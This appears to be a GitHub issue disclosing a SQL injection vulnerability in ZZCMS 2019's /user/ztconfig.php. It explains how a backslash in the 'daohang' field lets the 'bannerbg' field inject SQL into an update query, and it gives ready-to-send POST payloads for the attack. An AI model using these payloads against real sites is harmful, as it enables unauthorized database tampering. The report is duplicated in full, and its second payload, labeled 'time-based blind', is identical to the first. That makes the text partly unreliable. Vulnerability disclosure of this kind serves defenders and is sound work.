You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
0x01 Vulnerability (/user/ztconfig.php line 29 ~ 50)
When we start 'modify' logic we can see 'daohang' var receive $_POST['daohang'][$i] value
If we give string value for $_POST['daohang'] not Array $_POST['daohang'][0] daohang var will
receive $i's index string not Array. So If we give '\' value for $_POST['daohang'] 'daohang' var
will get '\' value
We can find '\' value in update query it means ' value after 'daohang' parameter does not mean
any more.
After 'daohang' paramter 'bannerbg' will appear and if we check about 'bannerbg' parameter
we can't find any other security filter. So we can inject any query via 'bannerbg' parameter
0x02 payload
give below "POC" value for post data in "/user/ztconfig.php?action=modify"
POC : update SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
POC2 : Time based Blind SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
The text was updated successfully, but these errors were encountered:
Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)
0x01 Vulnerability (/user/ztconfig.php line 29 ~ 50)
When we start 'modify' logic we can see 'daohang' var receive $_POST['daohang'][$i] value
If we give string value for $_POST['daohang'] not Array $_POST['daohang'][0] daohang var will
receive $i's index string not Array. So If we give '\' value for $_POST['daohang'] 'daohang' var
will get '\' value
We can find '\' value in update query it means ' value after 'daohang' parameter does not mean
any more.
After 'daohang' paramter 'bannerbg' will appear and if we check about 'bannerbg' parameter
we can't find any other security filter. So we can inject any query via 'bannerbg' parameter
0x02 payload
give below "POC" value for post data in "/user/ztconfig.php?action=modify"
POC : update SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
POC2 : Time based Blind SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
The text was updated successfully, but these errors were encountered: